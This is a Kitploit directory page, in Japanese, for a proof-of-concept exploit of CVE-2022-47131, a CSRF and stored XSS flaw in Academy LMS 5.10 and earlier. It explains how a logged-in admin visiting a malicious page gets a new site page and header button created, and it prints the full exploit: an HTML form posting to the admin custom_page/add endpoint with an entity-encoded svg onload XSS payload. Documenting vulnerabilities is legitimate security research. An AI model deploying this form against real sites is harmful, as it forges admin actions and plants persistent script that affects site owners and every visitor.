Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-47131 — Academy LMS 5.10以下 CSRF / XSS | Kitploit
ツール/GitHubGitHub/openxp-research/cve-2022-47131
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubopenxp-research/cve-2022-47131

CVE-2022-47131

Academy LMS 5.10以下 CSRF / XSS

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Description

Academy LMSは、ユーザーがコースを作成・宣伝できるアプリケーションです。新しいページを追加する機能はCSRFに対して脆弱です。この攻撃を回避するためのトークンが存在しないためです。さらに、このページを使用して保存されたXSSペイロードを読み込む可能性があります。

Proof of Concept (POC)

概念実証の最初のステップは、管理ユーザーとしてプラットフォームに認証することです。

その後、脆弱性を悪用するコードを含むページにアクセスするだけで、Webサイトのホームページに新しいボタンが追加され、xssページにリダイレクトされることが確認できます。

エクスプロイトに使用されたコード:

root@kitploit:~
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/custom_page/add" method="POST">
       <input type="hidden" name="page&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="page&#95;content" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;domain&#41;&#59;&gt ;" />
       <input type="hidden" name="files" value="" />
       <input type="hidden" name="button&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="button&#95;position" value="header" />
       <input type="hidden" name="page&#95;url" value="xss" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
ツールをダウンロード